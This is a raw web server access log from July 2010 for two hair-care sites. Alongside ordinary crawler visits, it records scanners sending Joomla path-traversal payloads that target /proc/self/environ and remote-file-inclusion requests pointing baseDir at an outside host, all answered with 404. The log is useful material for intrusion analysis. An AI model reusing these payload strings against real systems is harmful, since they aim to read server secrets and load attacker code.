208.101.2.242 - - [11/Jul/2010:22:38:49 -0700] "GET /index.php?option=com_soundset&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
129.97.219.71 - - [11/Jul/2010:22:40:07 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "growlonghairfast.com"
79.244.111.232 - - [11/Jul/2010:22:41:35 -0700] "GET /logs/access_100705.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://besojena.homelinux.org/WebCalendar/docs/error?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.244.111.232 - - [11/Jul/2010:22:41:52 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://besojena.homelinux.org/WebCalendar/docs/error?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
79.244.111.232 - - [11/Jul/2010:22:41:52 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://besojena.homelinux.org/WebCalendar/docs/error?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
79.244.111.232 - - [11/Jul/2010:22:41:52 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://besojena.homelinux.org/WebCalendar/docs/error?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
79.244.111.232 - - [11/Jul/2010:22:42:07 -0700] "GET /logs/access_100628.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://besojena.homelinux.org/WebCalendar/docs/error?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.244.111.232 - - [11/Jul/2010:22:42:27 -0700] "GET /logs/access_100705.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://besojena.homelinux.org/WebCalendar/docs/error?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
79.244.111.232 - - [11/Jul/2010:22:42:27 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://besojena.homelinux.org/WebCalendar/docs/error?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.249.65.252 - - [11/Jul/2010:22:45:21 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "growlonghairfast.com"
66.249.65.252 - - [11/Jul/2010:22:45:22 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13818 HTTP/1.1" 200 349 "-" "DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "growlonghairfast.com"
80.192.5.189 - - [11/Jul/2010:22:47:36 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.freehairsecrets.com"
80.192.5.189 - - [11/Jul/2010:22:47:36 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.freehairsecrets.com"
208.101.2.242 - - [11/Jul/2010:22:48:03 -0700] "GET /logs/access.log/index.php?option=com_soundset&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
208.101.2.242 - - [11/Jul/2010:22:48:03 -0700] "GET /index.php?option=com_soundset&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
208.101.2.242 - - [11/Jul/2010:22:48:03 -0700] "GET /logs/index.php?option=com_soundset&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
66.249.65.236 - - [11/Jul/2010:22:49:25 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "www.freehairsecrets.com"
66.249.65.236 - - [11/Jul/2010:22:49:26 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13074 HTTP/1.1" 200 349 "-" "DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "www.freehairsecrets.com"
80.192.5.189 - - [11/Jul/2010:22:49:27 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "growlonghairfast.com"
88.131.106.2 - - [11/Jul/2010:22:49:34 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.freehairsecrets.com"
88.131.106.2 - - [11/Jul/2010:22:49:43 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.freehairsecrets.com"
80.192.5.189 - - [11/Jul/2010:22:49:47 -0700] "POST /logs/access_100222.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "growlonghairfast.com"
80.192.5.189 - - [11/Jul/2010:22:49:48 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "growlonghairfast.com"
80.192.5.189 - - [11/Jul/2010:22:49:48 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "growlonghairfast.com"
125.141.91.138 - - [11/Jul/2010:22:50:43 -0700] "POST /logs/access_100301.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "growlonghairfast.com"
125.141.91.138 - - [11/Jul/2010:22:50:44 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "growlonghairfast.com"
125.141.91.138 - - [11/Jul/2010:22:50:44 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "growlonghairfast.com"
80.192.5.189 - - [11/Jul/2010:22:52:08 -0700] "POST /logs/access_100301.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "growlonghairfast.com"
129.97.219.71 - - [11/Jul/2010:22:53:23 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)" "growlonghairfast.com"
114.108.151.149 - - [11/Jul/2010:22:55:28 -0700] "GET /logs/access.log/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [11/Jul/2010:22:55:29 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [11/Jul/2010:22:55:30 -0700] "GET /logs/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
77.222.34.35 - - [11/Jul/2010:23:02:01 -0700] "GET /logs/access.log/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
77.222.34.35 - - [11/Jul/2010:23:02:01 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
77.222.34.35 - - [11/Jul/2010:23:02:01 -0700] "GET /logs/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
77.222.34.35 - - [11/Jul/2010:23:02:07 -0700] "GET /logs/access.log/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
77.222.34.35 - - [11/Jul/2010:23:02:08 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
77.222.34.35 - - [11/Jul/2010:23:02:09 -0700] "GET /logs/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
119.235.237.19 - - [11/Jul/2010:23:05:06 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "freehairsecrets.com"
129.97.219.71 - - [11/Jul/2010:23:05:44 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)" "growlonghairfast.com"
119.235.237.19 - - [11/Jul/2010:23:06:10 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13117 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "freehairsecrets.com"
195.191.40.23 - - [11/Jul/2010:23:07:24 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95; MSIECrawler)" "growlonghairfast.com"
195.191.40.23 - - [11/Jul/2010:23:07:25 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95; MSIECrawler)" "growlonghairfast.com"
174.34.185.226 - - [11/Jul/2010:23:09:41 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.34.185.226 - - [11/Jul/2010:23:09:41 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.34.185.226 - - [11/Jul/2010:23:09:44 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.34.185.226 - - [11/Jul/2010:23:09:44 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
85.19.150.100 - - [11/Jul/2010:23:11:05 -0700] "GET /index.php?option=com_canteen&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
174.34.185.226 - - [11/Jul/2010:23:11:54 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.34.185.226 - - [11/Jul/2010:23:11:58 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.218.116.171 - - [11/Jul/2010:23:12:06 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "freehairsecrets.com"
174.34.185.226 - - [11/Jul/2010:23:12:16 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.34.185.226 - - [11/Jul/2010:23:12:18 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.34.185.226 - - [11/Jul/2010:23:12:21 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.34.185.226 - - [11/Jul/2010:23:12:24 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.34.185.226 - - [11/Jul/2010:23:12:32 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.34.185.226 - - [11/Jul/2010:23:12:35 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
119.63.193.75 - - [11/Jul/2010:23:13:22 -0700] "GET /freehairsecretsphp/viewtopic.php HTTP/1.1" 200 128 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "freehairsecrets.com"
174.34.185.226 - - [11/Jul/2010:23:14:31 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.34.185.226 - - [11/Jul/2010:23:14:33 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
119.63.193.75 - - [11/Jul/2010:23:15:23 -0700] "GET /freehairsecretsphp/viewtopic.php?p=16751 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "freehairsecrets.com"
208.101.2.242 - - [11/Jul/2010:23:16:16 -0700] "GET /logs/access.log/index.php?option=com_soundset&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
208.101.2.242 - - [11/Jul/2010:23:16:16 -0700] "GET /index.php?option=com_soundset&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
208.101.2.242 - - [11/Jul/2010:23:16:16 -0700] "GET /logs/index.php?option=com_soundset&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
174.34.185.226 - - [11/Jul/2010:23:17:27 -0700] "GET /logs/access_100628.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.34.185.226 - - [11/Jul/2010:23:17:27 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.34.185.226 - - [11/Jul/2010:23:17:27 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.34.185.226 - - [11/Jul/2010:23:17:43 -0700] "GET /logs/access.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.34.185.226 - - [11/Jul/2010:23:17:43 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.34.185.226 - - [11/Jul/2010:23:17:43 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
85.19.150.100 - - [11/Jul/2010:23:18:03 -0700] "GET /logs/access.log/index.php?option=com_canteen&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
85.19.150.100 - - [11/Jul/2010:23:18:03 -0700] "GET /index.php?option=com_canteen&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
85.19.150.100 - - [11/Jul/2010:23:18:04 -0700] "GET /logs/index.php?option=com_canteen&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
64.120.225.202 - - [11/Jul/2010:23:18:11 -0700] "GET /*.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
129.97.219.71 - - [11/Jul/2010:23:18:12 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2" "growlonghairfast.com"
174.132.175.18 - - [11/Jul/2010:23:18:43 -0700] "GET /*.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
174.34.185.226 - - [11/Jul/2010:23:18:49 -0700] "GET /logs/access_100628.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.34.185.226 - - [11/Jul/2010:23:18:49 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.34.185.226 - - [11/Jul/2010:23:18:49 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.34.185.226 - - [11/Jul/2010:23:19:36 -0700] "GET /logs/access_100705.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.34.185.226 - - [11/Jul/2010:23:19:36 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.34.185.226 - - [11/Jul/2010:23:19:36 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.34.185.226 - - [11/Jul/2010:23:21:14 -0700] "GET /logs/access_100705.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.34.185.226 - - [11/Jul/2010:23:21:16 -0700] "GET /logs/access.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.34.185.226 - - [11/Jul/2010:23:21:16 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.34.185.226 - - [11/Jul/2010:23:21:16 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.34.185.226 - - [11/Jul/2010:23:21:51 -0700] "GET /logs/access.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.34.185.226 - - [11/Jul/2010:23:21:51 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.34.185.226 - - [11/Jul/2010:23:21:51 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.34.185.226 - - [11/Jul/2010:23:22:38 -0700] "GET /logs/access_100705.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.191.40.23 - - [11/Jul/2010:23:22:50 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "freehairsecrets.com"
195.191.40.23 - - [11/Jul/2010:23:22:50 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "freehairsecrets.com"
174.34.185.226 - - [11/Jul/2010:23:23:10 -0700] "GET /logs/access_100705.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.34.185.226 - - [11/Jul/2010:23:23:10 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.34.185.226 - - [11/Jul/2010:23:23:10 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.34.185.226 - - [11/Jul/2010:23:23:18 -0700] "GET /logs/access.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.34.185.226 - - [11/Jul/2010:23:23:18 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.34.185.226 - - [11/Jul/2010:23:23:18 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.34.185.226 - - [11/Jul/2010:23:24:25 -0700] "GET /logs/access_100705.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.34.185.226 - - [11/Jul/2010:23:24:25 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.34.185.226 - - [11/Jul/2010:23:24:25 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.34.185.226 - - [11/Jul/2010:23:24:25 -0700] "GET /logs/access_100705.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.34.185.226 - - [11/Jul/2010:23:24:25 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.34.185.226 - - [11/Jul/2010:23:24:25 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.34.185.226 - - [11/Jul/2010:23:24:47 -0700] "GET /logs/access_100628.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.34.185.226 - - [11/Jul/2010:23:24:50 -0700] "GET /logs/access_100628.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
